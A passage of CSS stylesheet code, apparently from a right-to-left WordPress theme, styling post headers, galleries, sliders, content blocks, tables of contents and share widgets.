100vw; height: 100%; content: ''; -webkit-transform: translateX(50%); transform: translateX(50%); pointer-events: none; border-top: 1px solid var(--flex-gray-15); } /* single highlights */ .s-hl { position: relative; padding-top: 20px; padding-bottom: 30px; } .s-hl-heading.h1 { font-size: 2.75rem; line-height: 1; position: absolute; z-index: -1; top: -10px; right: 15px; opacity: .15; } .s-hl-heading span { display: inline-block; } .s-hl-heading span::first-letter { color: var(--g-color); } .s-hl:after { position: absolute; top: auto; right: 0; bottom: 0; width: 90px; height: 1px; content: ''; background-color: var(--g-color); } .s-hl ul { position: relative; list-style: none; } .hl-point:before { position: absolute; top: .5em; display: inline-block; width: 8px; height: 8px; content: ''; -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--g-color); } .hl-point { position: relative; } .hl-point > * { display: inline-block; margin-right: 20px; } .hl-point:not(:last-child) > * { margin-bottom: 7px; padding-bottom: 7px; border-bottom: 1px solid var(--flex-gray-15); } .single-standard-1 .single-header { padding-top: 15px; } .single-standard-2 .single-header-inner { padding-top: 25px; } .single.is-standard-2 .header-transparent, .single.is-audio-2 .header-transparent, .single.is-video-2 .header-transparent { position: relative; top: auto; right: auto; left: auto; } .yes-hd-transparent.is-standard-5 .navbar-inner { border-bottom: 1px solid var(--flex-gray-20); } .single-standard-2 .single-header { margin-bottom: 30px; } .single-standard-7 .single-header { margin-bottom: 30px; padding-top: 20px; } .single-standard-1 .s-feat img, .single-standard-2 .s-feat img, .single-standard-7 .s-feat img, .single-standard-8 .s-feat img { border-radius: var(--round-5); } .single-standard-2 .s-feat img, .single-standard-7 .s-feat img { -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .single-standard-3 .single-header, .single-standard-4 .single-header { padding-top: 10px; padding-bottom: 30px; } .single-standard-3 .single-header-inner, .single-standard-4 .single-header-inner { overflow: hidden; border-radius: var(--round-5); } .single-standard-5 .single-header { padding-bottom: 30px; } .single-standard-8.single-embed-4 .grid-container, .single-standard-8 .grid-container { margin-top: 30px; } .single-embed-4 .s-feat-outer { margin-bottom: 0; padding-top: 30px; } .single-embed-4 .single-header { margin-bottom: 30px; } .single .single-no-featured .single-header { margin-bottom: 20px; padding-bottom: 0; border-bottom: 5px solid var(--flex-gray-15); } .without-sidebar .single-caption-outer.rb-container, .without-sidebar .single-caption-outer { max-width: 860px; margin-right: auto; margin-left: auto; } .single-header-inner { position: relative; display: block; } .single-standard-2 .single-header-inner:before { position: absolute; z-index: 0; top: 0; right: 0; bottom: 90px; left: 0; width: 100%; content: ''; background-color: var(--dark-accent); } .single-standard-2.no-sfeat .single-header-inner:before { bottom: 0; } .single-standard-2.no-sfeat .single-header-inner { padding-bottom: 10px; } .single-standard-2 .single-header-inner > * { position: relative; z-index: 1; } .single-embed-2 .embed-bg-overlay { position: absolute; top: 0; right: 0; bottom: 90px; left: 0; width: 100%; opacity: .1; background-repeat: no-repeat; background-position: center; background-size: cover; filter: blur(10px); -webkit-filter: blur(10px); } .s-feat-holder { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; overflow: hidden; } .single-header-content { position: relative; z-index: 1; display: flex; flex: 0 0 100%; flex-flow: column nowrap; padding-right: 20px; padding-left: 20px; } .single-standard-3 .single-header-inner:before, .single-standard-4 .single-header-inner:before { position: relative; display: block; padding-bottom: 33%; content: ''; } .single-header-content:before { position: absolute; z-index: -1; right: 0; bottom: 0; display: block; width: 100%; height: 140%; content: ''; background: var(--dark-accent); background: linear-gradient(to top, var(--dark-accent) 20%, transparent 100%); } .single-standard-4 .single-header-content { max-width: 940px; } .single-standard-4 .single-header-content:before { height: calc(100% - 7px); border-top-left-radius: var(--round-5); background: var(--dark-accent); } .single-standard-5 .single-header-content { padding: 20% 0; } .single-standard-5 .single-header-content:before { display: none; } .full-dark-overlay { background-color: var(--dark-accent); } .full-dark-overlay img { opacity: .3; } .single-standard-6 .single-header { margin-bottom: 30px; } .single-standard-6 .single-header:before { position: absolute; top: 0; right: 0; bottom: 40px; left: 0; content: ''; background-color: var(--flex-gray-7); } .single-header-columns { display: flex; align-items: center; margin-right: -20px; margin-left: -20px; } .single-header-columns > * { padding-right: 20px; padding-left: 20px; } .single-header-left { position: relative; flex: 0 0 60%; max-width: 100%; } .single-standard-6 .s-feat-outer { position: relative; flex: 0 0 40%; margin-bottom: 0; } .featured-vertical { position: relative; display: block; overflow: hidden; padding-bottom: 150%; border-bottom-right-radius: var(--round-5); border-bottom-left-radius: var(--round-5); } .featured-vertical img { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; object-fit: cover; } .single-standard-6 .caption-holder { position: absolute; top: auto; right: 20px; bottom: 0; left: 20px; border-bottom-right-radius: var(--round-5); border-bottom-left-radius: var(--round-5); background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, .25) 30%, rgba(0, 0, 0, .8) 100%); background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, .25) 30%, rgba(0, 0, 0, .8) 100%); } .single-standard-6 .feat-caption { margin: 10px 20px 10px 20px; } .sqview > *:not(:last-child) { margin-bottom: 10px; } .qview-box { overflow: hidden; align-items: stretch; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .qview-box.review-intro .inner { padding: 15px; } .qview-box .review-action { margin-top: 7px; padding-bottom: 0; } .qview-box .review-btn { line-height: var(--height-34); padding: 0 25px; } .spon-qview { padding: 4px 12px; } .spon-qview .sponsor-meta { margin-bottom: 0; } .spon-qview .sponsor-inner img { height: 3em; max-height: 50px; } .spon-qview .sponlogo-wrap { margin-right: auto; margin-left: 0; } .single .without-sidebar .s-ct { flex-basis: 100%; width: 100%; max-width: var(--max-width-wo-sb); margin-right: auto; margin-left: auto; } .featured-embed { position: relative; display: block; overflow: hidden; } .embed-holder { position: relative; display: block; width: 100%; padding-bottom: 56%; background-color: rgba(0, 0, 0, .025); } .float-holder { -webkit-transform: var(--effect); transform: var(--effect); } .floating-activated .float-holder { position: fixed; z-index: 9999; top: auto; right: auto; bottom: 100px; left: 20px; display: block; width: 420px; max-width: 100%; height: auto; } .floating-activated .float-holder:before { position: relative; display: block; width: 100%; padding-bottom: 56%; content: ''; } .floatingcolorose { position: absolute; top: auto; bottom: 100%; left: 0; display: block; } .embed-audio .embed-holder { padding-bottom: 33.33%; } .embed-holder iframe { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; border: none; border-radius: var(--round-5); } .slider-img-holder { display: block; width: 100%; padding-bottom: 56%; } .coverflow-img-holder { display: block; width: 100%; padding-bottom: 100%; } .slider-img-holder img, .coverflow-img-holder img { position: absolute; z-index: 98; display: block; width: 100%; height: 100%; border-radius: var(--round-5); object-fit: cover; } .gallery-slider-nav-holder img { border-radius: var(--round-3); } .carousel-img-holder img, .coverflow-img-holder img { border-radius: var(--round-5); } .gallery-slider-nav-outer { position: relative; display: flex; flex-flow: row nowrap; } .gallery-slider-nav-holder { position: relative; flex-grow: 1; } .gallery-slider-nav-holder .pre-load { max-height: 102px; opacity: 0; } .gallery-slider-nav { max-width: 750px; margin-top: 15px; margin-right: auto; margin-left: 0; } .gallery-slider-nav .slider-img-holder { padding-bottom: 66.7%; } .slider-caption { position: absolute; z-index: 99; bottom: 0; width: 85%; max-width: 600px; margin: 0; padding: 5px 0 5px 20px; border-top-left-radius: var(--round-5); background-color: var(--solid-white); } .format-gallery-slider .slider-caption { bottom: 30px; padding-right: 10px; } .format-gallery-carousel .caption-text:before, .format-gallery-slider .caption-text:before { width: 30px; } .gallery-slider-info { display: flex; align-items: center; flex-shrink: 0; padding-left: 30px; } .gallery-slider-info svg { width: 60px; } .current-slider-info { display: flex; flex-flow: column nowrap; margin-top: 15px; } .current-slider-count { font-size: 2em; line-height: 1; margin-top: 7px; } .format-gallery-carousel .swiper-container { overflow: visible; } .format-gallery-carousel .swiper-slide { width: auto; } .carousel-img-holder img { width: auto; height: 70vh; max-height: 70vh; object-fit: cover; } .format-gallery-carousel .swiper-scrollbar { position: relative; height: 2px; margin-top: 20px; } .format-gallery-coverflow .swiper-pagination { position: relative; margin-top: 20px; } .gallery-slider-nav .swiper-slide:not(.swiper-slide-thumb-active) img { opacity: .5; } .gallery-slider-nav .swiper-slide:hover img { opacity: 1; } .gallery-slider-nav img { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); } .gallery-coverflow .pre-load { max-height: 50vh; opacity: 0; } .slider-nav { font-size: 24px; position: absolute; z-index: 10; display: flex; flex-flow: row nowrap; color: #fff; } .slider-nav > * { line-height: 1; padding: 10px; -webkit-transition: var(--effect); transition: var(--effect); opacity: 0; } .slider-pagination-top.slider-pagination, .block-wrap .swiper-container-horizontal > .swiper-pagination-bullets { line-height: 0; position: absolute; z-index: 20; top: 0; right: auto; bottom: auto; left: 0; width: auto; height: auto; padding: 15px; } .slider-pagination-top .swiper-pagination-bullet { opacity: .7; color: var(--absolute-white); } .block-wrap:hover .slider-nav > * { opacity: .7; } .block-wrap .slider-nav > *:hover { opacity: 1; } .post-slider .p-wrap { margin-bottom: 0; } .post-slider .overlay-inner > * { -webkit-transition: opacity .5s var(--timing); transition: opacity .5s var(--timing); opacity: 0; } .elementor-editor-active .post-slider .overlay-inner > * { opacity: 1; } .post-slider .swiper-slide-active .overlay-inner > * { opacity: 1; } .swiper-slide-active .overlay-inner > *:nth-child(1) { -webkit-transition-delay: .3s; transition-delay: .3s; } .swiper-slide-active .overlay-inner > *:nth-child(2) { -webkit-transition-delay: .4s; transition-delay: .4s; } .swiper-slide-active .overlay-inner > *:nth-child(3) { -webkit-transition-delay: .5s; transition-delay: .5s; } .swiper-slide-active .overlay-inner > * { -webkit-transition-delay: .6s; transition-delay: .6s; } .e-ct-outer > * { margin-bottom: 30px; } .rbct { position: relative; display: block; } .optimal-line-length:not(.without-sidebar) .s-ct-wrap:not(.has-lsl) { max-width: 730px; margin-right: auto; margin-left: auto; } pre { font-family: Courier, monospace; overflow: auto; padding: 20px; white-space: pre-wrap; word-wrap: break-word; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .has-lsl .s-ct-inner { display: flex; display: -webkit-flex; flex-flow: row nowrap; } .l-shared-sec-outer { position: relative; flex-shrink: 0; padding-bottom: 40px; padding-left: 30px; } .has-lsl .e-ct-outer { flex-grow: 1; width: calc(100% - 78px); max-width: calc(100% - 78px); margin-right: auto; } .l-shared-sec { font-size: 18px; position: sticky; position: -webkit-sticky; top: 12px; -webkit-transition: top .3s ease; transition: top .3s ease; will-change: top; } .l-shared-items { display: flex; align-items: center; flex-flow: column nowrap; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .l-shared-sec .share-action { line-height: 48px; width: 48px; text-align: center; } .l-shared-sec i.rbi-whatsapp { width: 100%; } .l-shared-header { display: flex; align-items: center; flex-flow: column wrap; margin-bottom: 10px; } .l-shared-header i { font-size: 18px; } .rbct > *, .comment-content > * { max-width: 100%; margin-top: 0; margin-bottom: 1.5rem; } .rbct > *:last-child, .comment-content > *:last-child { margin-bottom: 0; } .rbct .clearfix { margin-bottom: 0; } .rbct p { word-wrap: break-word; } .comments-pagination { font-size: 12px; display: flex; display: -webkit-flex; justify-content: center; margin: 20px 0 20px 0; padding-bottom: 30px; border-bottom: 5px solid rgba(0, 0, 0, .07); } .comments-pagination .nav-previous, .comments-pagination .nav-next { padding-right: 10px; padding-left: 10px; } .rbct figure { max-width: 100%; height: auto; } .rbct > *.alignleft, img.alignleft, .rbct p img.alignleft { float: right; margin-right: 0; margin-left: 1.5rem; } img.aligncenter, .rbct p img.aligncenter, .rbct > *.aligncenter, .entry-summary > *.aligncenter { display: block; margin-right: auto; margin-left: auto; } .rbct > *.alignright, img.alignright, .rbct p img.alignright { float: left; margin-right: 1.5rem; margin-left: 0; } .rbct input[type='password'] { min-width: 40%; margin-right: 20px; } .rbct .woocommerce { margin-bottom: 0; } .rbct .woocommerce div.product { margin-bottom: 1.5rem; } .aligncenter { display: block; margin-right: auto; margin-left: auto; } .wp-block-image { max-width: 100%; margin-right: 0; margin-left: 0; } .wp-block-image img, .wp-block-image.alignfull img, .wp-block-image.alignwide img, .rbct > .alignwide { max-width: 100%; } .wp-block-image .alignleft, .wp-block-image .alignright, .wp-block-image.is-resized { display: table; margin-right: 0; margin-left: 0; } .wp-block-image .aligncenter { display: table; margin-right: auto; margin-left: auto; } .wp-block-image .aligncenter figcaption { text-align: center; } .image-caption, .wp-caption-text, .gallery-caption, .rbct .wp-block-audio figcaption, .rbct .wp-block-video figcaption, .rbct .wp-block-image figcaption, .rbct .wp-block-embed figcaption { font-size: var(--meta-fsize); margin: 0; padding-top: 5px; } figcaption:before, .wp-caption-text:before { display: inline-block; width: 30px; height: .3em; margin-left: 7px; content: ''; border-top: 1px solid; } .wp-block-image:not(.is-style-rounded) img { border-radius: var(--round-3); } .wp-block-button__link:hover, .is-style-outline > .wp-block-button__link:not(.has-background):hover, .wp-block-button__link.is-style-outline:not(.has-background):hover { color: #fff; background-color: var(--g-color); } .wp-block-image figure { margin: 0; } .wp-block-image .alignleft { float: right; margin-left: 1.5rem; } .wp-block-image .alignright { float: left; margin-right: 1.5rem; } .wp-block-image .aligncenter > figcaption, .wp-block-image .alignleft > figcaption, .wp-block-image .alignright > figcaption, .wp-block-image.is-resized > figcaption { display: table-caption; caption-side: bottom; } .wp-block-gallery.alignleft, .wp-block-gallery.alignright, .blocks-gallery-grid.alignleft, .blocks-gallery-grid.alignright { width: 100%; max-width: 420px; } .wp-block-gallery { width: 100% !important; margin-bottom: calc(2rem - 16px); } .wp-block-gallery.alignwide { clear: both; } .rbct .wp-block-cover .wp-block-cover-text a, .rbct .wp-block-gallery .blocks-gallery-image figcaption, .rbct .wp-block-gallery .blocks-gallery-item figcaption { color: var(--absolute-white); } .rbct .wp-block-gallery ul, .rbct .wp-block-gallery ol { padding-right: 0; list-style: none; } .wp-block-spacer, .rbct .wp-block-spacer { margin: 0; } .wp-block-cover, .wp-block-cover-image { height: auto; color: #fff; } .wp-block-cover-image.alignleft, .wp-block-cover-image.alignright { margin-bottom: 0; } .wp-block-cover-image .wp-block-cover-image-text, .wp-block-cover .wp-block-cover-text, section.wp-block-cover-image > h2 { max-width: 100%; margin: 0 auto !important; } .wp-block-cover__video-background, .rbct .wp-block-cover__video-background { width: 100%; height: 100%; } .wp-block-cover a { text-decoration: none !important; color: inherit !important; } .wp-block-cover a:hover { text-decoration: underline !important; } .rbct dt, .comment-content dt { font-weight: 700; } .rbct a.button { display: inline-block; } .rbct img, .rbct video, .comment-content img { max-width: 100%; height: auto; } .wp-block-video video { width: 100%; } .rbct address, .comment-content address { margin-bottom: 30px; } p:empty, .rbct p:empty, .comment-content p:empty { display: none; } .wp-caption img[class*='wp-image-'] { display: block; margin-right: auto; margin-left: auto; } .rbct figure a { border-bottom: none; } .rbct iframe { overflow: hidden; max-width: 100%; margin-right: auto; margin-bottom: 30px; margin-left: auto; } .rbct ol, .comment-content ol, .rbct ul, .comment-content ul { padding-right: 1rem; list-style-type: decimal; } .rbct ul, .comment-content ul { list-style: circle; } .rbct ul ul, .comment-content ul ul { list-style: disc; } .rbct li > ol, .rbct li > ul { padding-top: .5rem; } .rbct li { position: relative; margin-bottom: .5rem; } .comment-content li { position: relative; margin-bottom: 5px; } .rbct *[class*='wp-block'], .rbct [class*='wp-block'] * { list-style: none; } .rbct > ul[class*='wp-block'], .rbct > ol[class*='wp-block'] { padding-right: 0; } table { width: 100%; max-width: 100%; margin-bottom: 1.5rem; border-spacing: 0; border-collapse: collapse; text-align: right; border-right: 1px solid var(--flex-gray-15); border-bottom: 1px solid var(--flex-gray-15); } table thead { font-family: var(--h6-family); font-size: var(--h6-fsize); font-weight: var(--h6-fweight); font-style: var(--h6-fstyle); line-height: var(--h6-fheight, 1.2); letter-spacing: var(--h6-fspace); text-transform: var(--h6-transform); } th { padding: 5px 10px; border-top: 1px solid var(--flex-gray-15); } th:last-child { border-left: 1px solid var(--flex-gray-15); } td { padding: 5px 10px; border-top: 1px solid var(--flex-gray-15); border-left: 1px solid var(--flex-gray-15); } tr { position: relative; } .rbct tbody tr:nth-child(2n), .comment-content tbody tr:nth-child(2n) { background-color: rgba(0, 0, 0, .025); } .rbct > .wp-block-cover.aligncenter { display: flex; } .wp-block-group.has-background { padding: 20px 30px; } .wp-block-group__inner-container .wp-block-button { margin-bottom: 2rem; } .has-drop-cap:not(:focus):first-letter { font-size: 5em; font-weight: bold; line-height: .8; } .has-drop-cap:not(:focus):after { padding-top: 5px; } .rbct tr { display: table-row; vertical-align: middle; } .rbct td { display: table-cell; vertical-align: inherit; } .rbct .gallery, .gallery { display: flex; display: -webkit-flex; flex-flow: row wrap; margin-top: calc(2rem - 5px); margin-bottom: calc(2rem - 5px); text-align: center; } .gallery-item { position: relative; margin: 0 0 10px 0; padding: 5px; } .gallery-item img { display: block; max-width: 100%; margin-right: auto; margin-left: auto; } .gallery-item div { margin: 0; } .rbct .attachment img { display: block; margin-right: auto; margin-left: auto; } .rbct .twitter-tweet { margin-right: auto; margin-bottom: 0 !important; margin-left: auto; } .rbct blockquote.twitter-tweet { opacity: 0.1; } blockquote { position: relative; padding: 0 1em; quotes: '“' '”' '‘' '’'; } blockquote > * { margin-top: .75rem; margin-bottom: .75rem; } blockquote > *:first-child { margin-top: 0; } blockquote > *:last-child { margin-bottom: 0; } pre.wp-block-verse { font-family: Courier, monospace; } .rbct cite { font-size: var(--rem-mini); } .rbct .is-large cite { font-size: var(--rem-small); } .wp-block-pullquote blockquote:before { font-size: 5em; line-height: 0; position: relative; right: 0; display: block; margin-bottom: 5px; content: open-quote; color: var(--g-color); } .wp-block-pullquote.is-style-solid-color blockquote:before, .wp-block-pullquote.is-style-solid-color cite:before { color: inherit; } .wp-block-pullquote.alignleft, .wp-block-pullquote.alignright { padding: 2em 0; } .wp-block-pullquote.alignleft cite:before, .wp-block-pullquote.alignright cite:before { width: 20px; } .rbct .wp-block-pullquote cite { font-size: var(--rem-small); } .wp-block-pullquote.alignleft cite, .wp-block-pullquote.alignright cite { font-size: var(--rem-mini); } .wp-block-quote.is-large, .wp-block-quote.is-style-large { padding: 0 1.75em; } .wp-block-pullquote { margin-bottom: 0; } blockquote:before { font-size: 2rem; line-height: .75; position: absolute; right: 0; content: '“'; } .wp-block-quote:before { color: var(--g-color); } .wp-block-quote.is-large:before, .wp-block-quote.is-style-large:before { font-size: 3.5em; } .wp-block-quote p, blockquote p { font-family: var(--quote-family, var(--h1-family)); font-weight: var(--quote-fweight, var(--h1-fweight)); letter-spacing: var(--quote-fspace, var(--h1-fspace)); text-transform: var(--quote-transform, var(--h1-transform)); } [data-theme='dark'] blockquote, [data-theme='dark'] blockquote * { color: var(--absolute-white); } .wp-block-quote cite { font-family: var(--meta-family); font-size: var(--rem-small); line-height: 1; } cite br { display: none; } .wp-block-latest-posts.is-grid li { margin-top: 0; margin-bottom: .5rem; } .widget_rss cite:before, .wp-block-quote cite:before, .wp-block-pullquote cite:before { display: inline-block; width: 30px; height: .3em; margin-left: 7px; content: ''; color: var(--g-color); border-top: 1px solid; } .widget_rss cite:before { width: 20px; } .rbct iframe.instagram-media { margin-right: auto; margin-bottom: 1.5em; margin-left: auto; } .rbct a:not(.p-url):not(button):not(.p-category):not(.is-btn):not(.table-link):not(.table-link-depth):not(.wp-block-button__link):not(.wp-block-file__button), .elementor-widget-text-editor p a { font-weight: var(--hyperlink-weight, 700); font-style: var(--hyperlink-style, normal); -webkit-transition: var(--effect); transition: var(--effect); color: var(--hyperlink-color, inherit); text-underline-offset: 1px; text-decoration-color: var(--hyperlink-line-color, transparent); text-decoration-line: underline; } .rbct a:not(.p-url):not(button):not(.p-category):not(.is-btn):not(.table-link):not(.table-link-depth):not(.wp-block-button__link):not(.wp-block-file__button):hover, .elementor-widget-text-editor p a:hover { color: var(--g-color); text-decoration-color: var(--g-color) } .rbct [class*='wp-block'] a { font-family: var(--dwidgets-family); font-size: var(--dwidgets-fsize); font-weight: var(--dwidgets-fweight) !important; font-style: var(--dwidgets-fstyle) !important; line-height: 1.4; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; letter-spacing: var(--dwidgets-fspace); text-transform: var(--dwidgets-transform); } .rbct .wp-block-button a.wp-block-button__link { font-family: var(--btn-family); font-size: var(--btn-fsize); font-weight: var(--btn-fweight) !important; font-style: var(--btn-fstyle) !important; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; letter-spacing: var(--btn-fspace); text-transform: var(--btn-transform); border-radius: var(--round-5); } .rbct [class*='wp-block'] a:not(.wp-block-button__link):not(.wp-block-file__button):not(:hover) { color: inherit !important; } .rbct .wp-block-file .wp-block-file__button { color: #fff; border-radius: var(--round-5); } .rbct .wp-block-embed.wp-block-embed-facebook, .rbct .wp-block-embed.wp-block-embed-instagram, .rbct .wp-block-embed.wp-block-embed-twitter { max-width: 520px; margin-right: auto; margin-left: auto; } .gallery-columns-1 .gallery-item { flex: 0 0 100%; width: 100%; } .gallery-columns-2 .gallery-item { flex: 0 0 50%; width: 50%; } .gallery-columns-3 .gallery-item { flex: 0 0 33.333%; width: 33.33%; } .gallery-columns-4 .gallery-item { flex: 0 0 25%; width: 25%; } .gallery-columns-5 .gallery-item { flex: 0 0 20%; width: 20%; } .gallery-columns-6 .gallery-item { flex: 0 0 16.66%; width: 16.66%; } .gallery-columns-7 .gallery-item { flex: 0 0 14.285%; width: 14.285%; } .gallery-columns-8 .gallery-item { flex: 0 0 12.5%; width: 12.5%; } .gallery-columns-9 .gallery-item { flex: 0 0 11.111%; width: 11.111%; } /** inline content ad */ .inline-single-ad.alignfull { display: block; float: none; width: 100%; } .rbct .wpcf7 { position: relative; display: block; overflow: hidden; max-width: 900px; margin-right: auto; margin-bottom: 30px; margin-left: auto; } .rbct .wpcf7 label { display: none; } .rbct .wpcf7 br { display: none; } .wpcf7-list-item input[type='checkbox'], .wpcf7-list-item input[type='radio'] { display: inline-flex; margin-top: 0; margin-bottom: 0; margin-left: 7px; } .wpcf7-form { display: flex; align-items: flex-start; flex-flow: row wrap; margin-right: -12px; margin-left: -12px; } .wpcf7-form .wpcf7-form-control-wrap { width: 50%; max-width: 50%; padding: 12px; } .wpcf7-form .wpcf7-form-control-wrap.your-message { width: 100%; max-width: 100%; } .wpcf7-form .wpcf7-form-control-wrap input { width: 100%; max-width: 100%; } .wpcf7-form .wpcf7-submit { margin: 12px 12px 0 12px; } span.wpcf7-list-item { display: flex; display: -webkit-flex; align-items: center; margin-right: 0; padding-top: 10px; } button, .button, .faux-button, .rbct .wp-block-button__link, .wp-block-file .wp-block-file__button, .rbct input[type='button'], .rbct input[type='reset'], .rbct input[type='submit'] { text-decoration: none; } ul.rb-list, ol.rb-list { padding-right: 0; list-style: none; } .rb-list li:before { font-family: 'ruby-icon' !important; font-size: var(--em-mini); position: relative; display: inline-block; margin-left: 7px; content: '\e960'; color: #5e8858; } .wp-block-group__inner-container > *:not(:last-child) { margin-bottom: 1.5rem; } .rbct .wp-block-file .wp-block-file__button { font-size: 0.88889em; line-height: 1.8; display: table; margin-top: calc(0.75 * 1em); margin-right: 0; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); background-color: var(--g-color); } .rbct blockquote:before { color: var(--g-color); } .rbct table thead { color: #fff; background-color: #333; } .rbct > p > img { margin-top: 1rem; margin-bottom: 1rem; } .rbct > figure.wp-caption.alignleft, .rbct > figure.wp-caption.alignnone, .rbct > figure.wp-caption.aligncenter, .rbct > figure.wp-caption.alignright { margin-top: 1rem; } .rbct > :last-child.wp-block-image { overflow: hidden; } .page-template-default .s-ct .comment-box-wrap.entry-sec, .page-template-default .rbct > *.alignright { clear: both; } .single-rb-etemplate { padding-top: 50px; } .single-rb-etemplate ul, .single-rb-etemplate ol { list-style: none; } .admin-template-info { font-size: 11px; margin-top: 20px; padding: 7px 10px; text-align: center; background-color: var(--flex-gray-15); } .wp-block-pullquote.is-style-solid-color blockquote { margin-bottom: 0; padding: 30px; } .wp-block-pullquote.is-style-solid-color blockquote:before { margin-bottom: 0; } .rbtoc { display: inline-flex; float: none; flex-flow: column nowrap; width: 100%; max-width: 100%; margin-left: 0; padding: 20px; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .toc-header { display: flex; align-items: center; width: 100%; margin-bottom: 20px; } .toc-header i { line-height: 0; margin-left: 7px; color: var(--g-color); } .rbtoc .inner a { position: relative; display: block; margin-top: 7px; padding-top: 7px; -webkit-transition: var(--effect); transition: var(--effect); opacity: 1; border-top: 1px solid var(--flex-gray-15); } .rbtoc a:before { font-size: var(--em-mini); display: inline-flex; flex-grow: 0; margin-left: 5px; padding: 0 4px; -webkit-transition: var(--effect); transition: var(--effect); color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--dark-accent); } .rbtoc .inner a:visited, [data-theme='dark'] .rbtoc .inner a:visited:not(:hover):before { color: var(--flex-gray-15); } .rbtoc.no-numlist a:before { display: none; } body:not([data-theme='dark']) .rbtoc .inner a:visited:not(:hover):before { background-color: var(--flex-gray-15); } .rbtoc .inner a:hover { opacity: 1; color: var(--g-color); } .rbtoc a:hover:before { background-color: var(--g-color); } .rbtoc .inner { counter-reset: table-content; } .table-link { counter-reset: table-content-subsection; } .table-link:before { content: counter(table-content); counter-increment: table-content; } .table-link-depth:before { content: counter(table-content) '.' counter(table-content-subsection); counter-increment: table-content-subsection; } div.rbtoc .inner a:first-child { margin-top: 0; padding-top: 0; border-top: 0; } .table-link-depth { margin-right: 20px; } .rbtoc.table-left .table-link-depth:before { margin-left: 3px; } .wp-block-archives, .wp-block-categories { max-width: 350px; } .wp-block-categories-list .count, .wp-block-archives-list .count { font-size: 11px; line-height: 18px; float: left; min-width: 18px; padding: 0 3px; -webkit-transition: var(--effect); transition: var(--effect); text-align: center; color: var(--absolute-white); background-color: var(--absolute-dark); } .wp-block-archives-dropdown select { width: 100%; } .wp-block-latest-comments li { margin-bottom: 20px; } .wp-block-latest-comments a.wp-block-latest-comments__comment-author { text-decoration: none !important; } .wp-block-latest-comments a.wp-block-latest-comments__comment-link { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); line-height: var(--h4-fheight, 1.4); margin-top: 2px; margin-bottom: 0; text-decoration: none !important; } .wp-block-latest-comments .wp-block-latest-comments__comment-date { font-size: 12px; font-weight: 500; margin-top: 5px; color: var(--meta-fcolor); } .wp-block-latest-comments .wp-block-latest-comments__comment-excerpt { font-size: var(--rem-small); line-height: 1.7; margin-top: 12px; } .wp-block-latest-posts li { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); line-height: var(--h4-fheight, 1.4); position: relative; display: block; } .wp-block-separator.is-style-dots:before { padding-right: 1.5rem; letter-spacing: 1.5rem; } .wp-block-latest-posts li:before { font-family: 'ruby-icon' !important; font-size: 8px; font-weight: normal; display: inline; margin-left: 6px; content: '\e900'; -webkit-transition: var(--effect); transition: var(--effect); vertical-align: middle; } .wp-block-latest-posts li:hover:before { text-decoration: none; color: var(--absolute-white); background-color: var(--g-color); } .wp-block-latest-posts__post-date { font-size: 12px; margin-top: 5px; color: var(--meta-fcolor); } .wp-block-rss .wp-block-rss__item-title a { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); display: block; letter-spacing: var(--h4-fspace); } .wp-block-rss .wp-block-rss__item-title a:before { font-family: 'ruby-icon' !important; font-size: var(--em-mini); position: relative; margin-left: 7px; content: '\42'; } .wp-block-rss li.wp-block-rss__item { margin-bottom: 15px; } hr.wp-block-separator:not(.is-style-dots):not(.is-style-wide) { max-width: 100px; margin-right: 0; } .wp-block-separator:not(.is-style-dots) { position: relative; display: block; height: 10px; margin-top: 30px; margin-bottom: 30px; opacity: 1; border: none; background-color: transparent; background-image: radial-gradient(currentColor 1px, transparent 1px); background-repeat: repeat; background-position: 1px 1px; background-size: 5px 5px; } .wp-block-separator:not(.is-style-wide):not(.is-style-dots) { position: relative; display: block; width: 100%; max-width: 100%; height: 10px; margin-top: 30px; margin-bottom: 30px; opacity: .25; border: none; background-color: transparent; background-image: radial-gradient(currentColor 1px, transparent 1px); background-repeat: repeat; background-position: 1px 1px; background-size: 5px 5px; } .rbct *::selection { background: #cfddf0; } [data-theme='dark'] .rbct *::selection { background: #3e4c5f; } .wp-block-code code { font-family: Courier, monospace; display: block; white-space: pre-wrap; overflow-wrap: break-word; } .highlight-shares { line-height: 0; z-index: 999; cursor: pointer; -webkit-transition: all .3s var(--timing); transition: all .3s var(--timing); } .highlight-shares i { font-size: 16px; display: inline-flex; align-items: center; justify-content: center; width: 32px; height: 38px; color: var(--absolute-white); } .highlight-shares i.rbi-reddit { font-size: 20px; margin-top: -2px; } .highlight-shares > div:first-child { display: flex; align-items: center; flex-flow: row nowrap; border-radius: var(--round-7); background-color: var(--absolute-dark); -webkit-box-shadow: 0 4px 15px rgba(0, 0, 0, .15); box-shadow: 0 4px 15px rgba(0, 0, 0, .15); } .highlight-shares > div:last-child { right: 50%; margin-right: -5px; border-top: 5px solid var(--absolute-dark); -webkit-box-shadow: 0 4px 15px rgba(0, 0, 0, .15); box-shadow: 0 4px 15px rgba(0, 0, 0, .15); } .page-selected-outer { display: flex; align-items: center; flex-flow: row nowrap; border-radius: var(--round-7); box-shadow: 0 5px 30px var(--shadow-7); } .page-selected-title { display: flex; align-items: center; padding: 0 10px; } .page-selected-title span { line-height: 1; padding: 7px 15px; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--g-color); } .page-selected-current { display: flex; align-items: center; cursor: pointer; } .page-selected { position: relative; display: flex; flex-grow: 1; padding: 10px; } .page-selected-nav { padding: 10px; } 